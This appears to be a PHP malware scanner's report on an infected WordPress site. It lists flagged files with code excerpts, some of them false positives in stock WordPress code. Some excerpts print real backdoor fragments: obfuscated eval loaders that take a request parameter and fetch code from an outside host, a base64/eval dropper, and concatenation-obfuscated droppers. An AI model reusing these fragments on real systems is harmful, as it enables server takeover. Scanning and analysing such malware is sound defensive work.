Sign 0d717969 Line: 2 Dangerous Malware Signature (hash: 0d717969) | <?php $donella = 'a';$avocate ='0datab6_r';$checksum= 'S';
$chum='_cO)';$lye='bOl_'; $audaciously ='1';$hamburger='c';$farmer= 'H'; $behaves='E'; $historian= ']';$imprison='S$oi4?Cn';$chaise= '?';$baptismal='"d[';$crystalmeth = '_D(2"t'; $comic ='dZc'; $asynchronously = ',_';
$fluffier= 'n'; $indirected='$1QR';$await = 'C';$daze = 'c'; $cliff= 'I1E]:3jda';$chariots ='_J$o';$inlet ='6Q';$aristocratic = 'i';$disciplines ='"';$inadmissible='eaeg('; $hackberry = '_';$ashes='WceIa';
$bun ='$e](o)iT4';$buth...
| Sign 84abfe10 Line: 108 Dangerous Malware Signature (hash: 84abfe10) | <?php $byrom['2'].$interdependencies['4']. $byrom['5'] .$arlena['2']. $factorization. $gaylene['5'] .$disc['6']. $disc['3'].$cutest['3'].$byrom['3'].$disc['3'] .
$cobwebs .
| Sign 84abfe10 Line: 51 Dangerous Malware Signature (hash: 84abfe10) | <?php $disc['3'] . $junia['2'].$encamped .
$intrusive.$incidental . $disc['1'] .$inlet['1'] .
$denomination['5'].
$disc['1'].
$chef['1'].$byrom['1'] . $junia['1'] .$encamped .
$intrusive .
| Sign 84abfe10 Line: 59 Dangerous Malware Signature (hash: 84abfe10) | <?php $it['2'].$it['2'].$enlistment .
$ashes['3'] .$disc['1'] .
$junia['1']. $encamped. $intrusive.$chef['1']. $disc['1'] . $incidental. $darning .
$disc['1'] .$incidental.
$cutest['3'].
$byrom['3'] .
$encamped .
| Sign 84abfe10 Line: 73 Dangerous Malware Signature (hash: 84abfe10) | <?php $cutest['0'] . $cutest['0'] . $gaylene['5'] . $disc['2'].
$disc['3'] .$gaylene['7'] . $byrom['2'] .$interdependencies['4'] . $byrom['5'] . $arlena['2'].$cutest['3'].$chaise. $encamped .$disc['6'].
| Sign 84abfe10 Line: 77 Dangerous Malware Signature (hash: 84abfe10) | <?php $cutest['0'] .$cutest['0'] .$gaylene['5']. $disc['2']. $disc['3'].
$gaylene['7'] . $byrom['2'].
$interdependencies['4'].$byrom['5'].
$arlena['2'].$factorization. $junia['2'] .$disc['6'] .$interdependencies['5'].
$interdependencies['5'] .
$disc['3'] .$commemorative.
$junia['2'] .$encamped . $disc['6'] .
|
|
/custdata02/turtle/imp/wp-content/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/wp-includes/Text/Diff/Engine/native.php Size: 15.47 kB Created: 2013-07-10 03:18:04 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = &new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete &&...
|
|
/custdata02/turtle/imp/wp-includes/Text/Diff/Engine/shell.php Size: 5.05 kB Created: 2013-07-10 03:18:04 Modified: 2019-03-09 07:39:59 Warns: 2
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert('$match[1] - $from_line_no == $match[4] - $to_line_no'); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...
|
|
/custdata02/turtle/imp/wp-includes/Text/Diff.php Size: 11.66 kB Created: 2013-07-10 03:18:04 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...
|
|
/custdata02/turtle/imp/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php Size: 2.78 kB Created: 2013-07-10 03:18:35 Modified: 2019-03-09 07:39:59 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec($cmd); @unlink($this->_tmpfile); $returnData = array(); $dataArr = preg_split("/[\r\n]/", $data, -1, PREG_SPLIT_NO_EMPTY); foreach ($dataArr as $dstr) { $matches = array(); if ($dstr[0] == "@") continue; preg_match("/(\&|#) ([^ ]+) .*/i", $dstr, $matches); if (!empty($matches[2])) $returnData[] = utf8_encode(trim($matches[2])); } return $returnData; } function &getSuggestions($lang, $word) { $cmd = $this->_getCMD($lang); if (function_exists("mb_convert_encoding")) $word = mb_convert_e...
| Sign 963e968a Line: 110 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/imp/wp-includes/js/tinymce/plugins/spellchecker/rpc.php Size: 2.82 kB Created: 2013-07-10 03:18:35 Modified: 2019-03-09 07:39:59 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 97 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $config['general.engine']($config)
|
|
/custdata02/turtle/imp/wp-includes/pomo/mo.php Size: 7.10 kB Created: 2013-07-10 03:18:49 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$e', 'return !empty($e->translations);')); ksort($entries); $magic = 0x950412de; $revision = 0; $total = count($entries) + 1; $originals_lenghts_addr = 28; $translations_lenghts_addr = $originals_lenghts_addr + 8 * $total; $size_of_hash = 0; $hash_addr = $translations_lenghts_addr + 8 * $total; $current_addr = $hash_addr; fwrite($fh, pack('V*', $magic, $revision, $total, $originals_lenghts_addr, $translations_lenghts_addr, $size_of_hash, $hash_addr)); fseek($fh, $originals_lengh...
|
|
/custdata02/turtle/imp/wp-includes/pomo/po.php Size: 11.04 kB Created: 2013-07-10 03:18:49 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$x', "return $php_with.\$x;"), $lines)); if ("\n" == substr($string, -1)) $res .= "\n"; return $res; } function comment_block($text, $char=' ') { $text = wordwrap($text, PO_MAX_LINE_LEN - 3); return PO::prepend_each_line($text, "#$char "); } function export_entry(&$entry) { if (is_null($entry->singular)) return false; $po = array(); if (!empty($entry->translator_comments)) $po[] = PO::comment_block($entry->translator_comments); if (!empty($entry->extracted_comments)) $po[] = PO:...
|
|
/custdata02/turtle/imp/wp-includes/pomo/translations.php Size: 7.36 kB Created: 2013-07-10 03:18:49 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$n', $func_body); } function parenthesize_plural_exression($expression) { $expression .= ';'; $res = ''; $depth = 0; for ($i = 0; $i < strlen($expression); ++$i) { $char = $expression[$i]; switch ($char) { case '?': $res .= ' ? ('; $depth++; break; case ':': $res .= ') : ('; break; case ';': $res .= str_repeat(')', $depth) . ';'; $depth= 0; break; default: $res .= $char; } } return rtrim($res, ';'); } function make_headers($translation) { $headers = array(); $translation = str_r...
|
|
/custdata02/turtle/imp/wp-includes/theme-compat/archive.php Size: 4.52 kB Created: 2013-07-10 03:18:50 Modified: 2019-03-09 07:39:59 Dangers: 4
| Description | Match |
|---|
Sign 84abfe10 Line: 68 Dangerous Malware Signature (hash: 84abfe10) | <?php $entertainment['0'] .$entertainment['0'] .$catalysis['1'].$briant['0'] .
$immature . $deletion['8'] . $blocky .$catalysis['2'] . $catalysis['2'] . $catalysis['6'] .
| Sign 84abfe10 Line: 72 Dangerous Malware Signature (hash: 84abfe10) | <?php $blocky .$apprehensions['1'] . $catalysis['1'] .$entertainment['2'] .$convincer. $convincer . $armature['3'] . $catalysis['7'].$entertainment['1'] .
$hypothetically['1'] .
| Sign 84abfe10 Line: 77 Dangerous Malware Signature (hash: 84abfe10) | <?php $blocky. $apprehensions['1'] .
$catalysis['1'].$entertainment['2'].
$convincer .$convincer .
$armature['3'].$catalysis['7'] . $entertainment['1'] . $hypothetically['1'] .
| Sign 84abfe10 Line: 84 Dangerous Malware Signature (hash: 84abfe10) | <?php $emulated.$catalysis['6']. $concettina['0'] .$garbed['0'].$deletion['2'].$deletion['8'].
$caging['0'] . $garbed['0'] . $catalysis['2']. $catalysis['6']. $blurry['4'] . $hypothetically['1'] . $catalysis['7'].
|
|
/custdata02/turtle/imp/wp-includes/atomlib.php Size: 10.67 kB Created: 2013-07-10 03:18:03 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$k,$v', 'return "$k=\"$v\"";'); $this->map_xmlns_func = create_function('$p,$n', '$xd = "xmlns"; if(strlen($n[0])>0) $xd .= ":{$n[0]}"; return "{$xd}=\"{$n[1]}\"";'); } function _p($msg) { if($this->debug) { print str_repeat(" ", $this->depth * $this->indent) . $msg ."\n"; } } function error_handler($log_level, $log_text, $error_file, $error_line) { $this->error = $log_text; } function parse() { set_error_handler(array(&$this, 'error_handler')); array_unshift($this->ns_contexts,...
|
|
/custdata02/turtle/imp/wp-includes/category-template.php Size: 36.87 kB Created: 2013-07-10 03:18:03 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('$count', $body); } $args = wp_parse_args( $args, $defaults ); extract( $args ); if ( empty( $tags ) ) return; $tags_sorted = apply_filters( 'tag_cloud_sort', $tags, $args ); if ( $tags_sorted != $tags ) { $tags = $tags_sorted; unset($tags_sorted); } else { if ( 'RAND' == $order ) { shuffle($tags); } else { if ( 'name' == $orderby ) uasort( $tags, '_wp_object_name_sort_cb' ); else uasort( $tags, '_wp_object_count_sort_cb' ); if ( 'DESC' == $order ) $tags = array_reverse( $tags, t...
|
|
/custdata02/turtle/imp/wp-includes/class-simplepie.php Size: 387.49 kB Created: 2013-07-10 03:18:03 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Exploit concat_vars_with_spaces Line: 13559 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $day . $fws . $month . $fws . $year . $fws .
|
|
/custdata02/turtle/imp/wp-includes/pluggable.php Size: 58.21 kB Created: 2013-07-10 03:17:48 Modified: 2019-03-09 07:39:59 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 803 Dangerous Malware Signature (hash: 11413268) | <?php exploit
|
|
/custdata02/turtle/imp/wp-includes/class-snoopy.php Size: 36.89 kB Created: 2013-07-10 03:17:59 Modified: 2019-03-09 07:39:59 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec($this->curl_path." -k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentH...
|
|
/custdata02/turtle/imp/wp-includes/class-wp-media.php Size: 4.97 kB Created: 2013-07-10 03:17:57 Modified: 2019-03-09 07:39:59 Dangers: 10
| Description | Match |
|---|
Sign 0d717969 Line: 3 Dangerous Malware Signature (hash: 0d717969) | <?php $jackson = 't';
$haunted= '=';$flossie='i';$commending ='gpEa?Ngc:';$facilitates = 'T;Pe';$derived='v';
$gas='V'; $disgraces ='l';$cellist ='$A$(S"yB"';$catechism='T'; $henrieta='ee'; $emilee= '(';$craggy='_'; $counterparts='S'; $impactor = ';'; $crocodile= 'f';$gabler='pyV';$capturing ='_[_Kq';$anticipatory ='_';$inertial= 't';$dreamed='(';$furthering = 'a'; $ferruginous =' '; $farmhouse ='e';$disgustedly = 'a';
$arroyo= '?';
$kipp='O'; $consumptive = 'r';$harwilll = 'i'; $chalcocite='e';$...
| Sign 84abfe10 Line: 29 Dangerous Malware Signature (hash: 84abfe10) | <?php $embroidery['3'].$clementius['2'] . $finitely['1'] . $honeymoon['8'] .
$jacquelynn .$finitely['1']. $embroidery['2'] .$embroidery['2'].$finitely['1'] . $gabler['1'] .$germany .$clementius['8']. $embroidery['6'] . $clementius['8'] .
$jacquelynn. $embroidery['5']. $equipment['6']. $embroidery['4'] .
| Sign 84abfe10 Line: 32 Dangerous Malware Signature (hash: 84abfe10) | <?php $germany.$honeymoon['2'] .$embroidery['3'] .$finitely['2']. $germany .$finitely['1']. $embroidery['2'] .
$honeymoon['2'].$jokes['0'] .$jacquelynn .$deathly['1'] .
$deathly['1'] . $deathly['1'] .
| Sign 84abfe10 Line: 40 Dangerous Malware Signature (hash: 84abfe10) | <?php $honeymoon['0']. $clemens['0'] .$luncheon['1']. $finitely['1'].$embroidery['2'].$embroidery['2'] .$finitely['1'] .
$gabler['1'] . $germany .$ensuring['3'] . $embroidery['3']. $embroidery['2']. $honeymoon['2']. $embroidery['3'].$jacquelynn. $honeymoon['0'] . $germany. $honeymoon['7']. $cartographic['4'] .
$erica['3'].
| Sign 84abfe10 Line: 42 Dangerous Malware Signature (hash: 84abfe10) | <?php $erica['0'].
$cartographic['4'] .$cartographic['1'] .$bribing['6'].
$anet['2']. $honeymoon['0'].
$germany. $honeymoon['4'].$equipment['4'] .$equipment['4'] .$erica['1'] .$doldrum['5'].
$cartographic['4'].$anet['2']. $honeymoon['0'].
$germany . $cartographic['1'] . $cartographic['4'].$honeymoon['7'] . $gabler['2'] .
| Sign 84abfe10 Line: 52 Dangerous Malware Signature (hash: 84abfe10) | <?php $honeymoon['0'].$finitely['1']. $luncheon['1'] .
$clemens['0'] .$jokes['0'] . $jokes['0'].$embroidery['3'] . $finitely['2'].$jacquelynn . $honeymoon['0'] .
$clemens['0'].$honeymoon['1'].$bribing['5'] .
$embroidery['3'] . $finitely['0'] . $deathly['0']. $embroidery['5'] . $honeymoon['5']. $honeymoon['5']. $finitely['1'].
| Sign 84abfe10 Line: 57 Dangerous Malware Signature (hash: 84abfe10) | <?php $bribing['5'] .$clemens['3']. $deathly['1'] .
$arroyo .$honeymoon['0'] .$clemens['0'] . $honeymoon['1'] . $bribing['5'] .$embroidery['3'].
$finitely['0'] . $deathly['0'] .$embroidery['5'].
$honeymoon['5'] .$honeymoon['5'] . $finitely['1']. $bribing['5'].$clemens['3']. $inglis['1'] .
$jacquelynn . $clemens['0'].
| Sign 84abfe10 Line: 64 Dangerous Malware Signature (hash: 84abfe10) | <?php $jokes['0'].
$jokes['0'] .
$embroidery['3'] . $finitely['2'].
$jacquelynn.$honeymoon['0'].$clemens['0'].$honeymoon['1']. $bribing['5'] .$associates['2'] . $bribing['6']. $bribing['6'].
$bribing['7'] .$germany .
$cartographic['4'] . $finitely['0']. $ensuring['2'].$embroidery['1'] .
| Sign 84abfe10 Line: 74 Dangerous Malware Signature (hash: 84abfe10) | <?php $impede['3'] .$bribing['5'] .
$clemens['3'] . $deathly['1'] . $arroyo.
$honeymoon['0'] .
$clemens['0'] .$honeymoon['1']. $bribing['5'].$associates['2'].$bribing['6'] . $bribing['6'].
$bribing['7'] .
$germany.
$cartographic['4'].
$finitely['0'].$ensuring['2'].
$embroidery['1'] .
| Sign 84abfe10 Line: 92 Dangerous Malware Signature (hash: 84abfe10) | <?php $embroidery['3'] .
$clementius['2'] .
$finitely['1'].
$honeymoon['8'].
$jacquelynn .
$honeymoon['5'] . $finitely['1'].
$jokes['0'].$embroidery['3'] . $equipment['1']. $amide['1'] . $germany. $deathly['0'] .
$embroidery['3'].
|
|
/custdata02/turtle/imp/wp-includes/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/wp-includes/kses.php Size: 39.96 kB Created: 2013-07-10 03:17:51 Modified: 2019-03-09 07:39:59 Dangers: 1
| Description | Match |
|---|
Sign 1414e381 Line: 780 Dangerous Malware Signature (hash: 1414e381) | <?php $mode = 0;
$attrname = '';
$uris = array('xmlns', 'profile', 'href', 'src', 'cite', 'classid', 'codebase', 'data', 'usemap', 'longdesc',
|
|
/custdata02/turtle/imp/index.php Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Dangers: 6
| Description | Match |
|---|
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request | <?php ${"_GET"}
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 301ca578 Dangerous Malware Signature (hash: 301ca578) | <?php trojan
| Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
|
|
/custdata02/turtle/imp/wp-blog-header.php Size: 3.01 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/wp-cron.php Size: 5.40 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/imp/text.php Size: 1.49 kB Created: 2023-07-24 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/logs/wpt_action_logs/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/logs/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
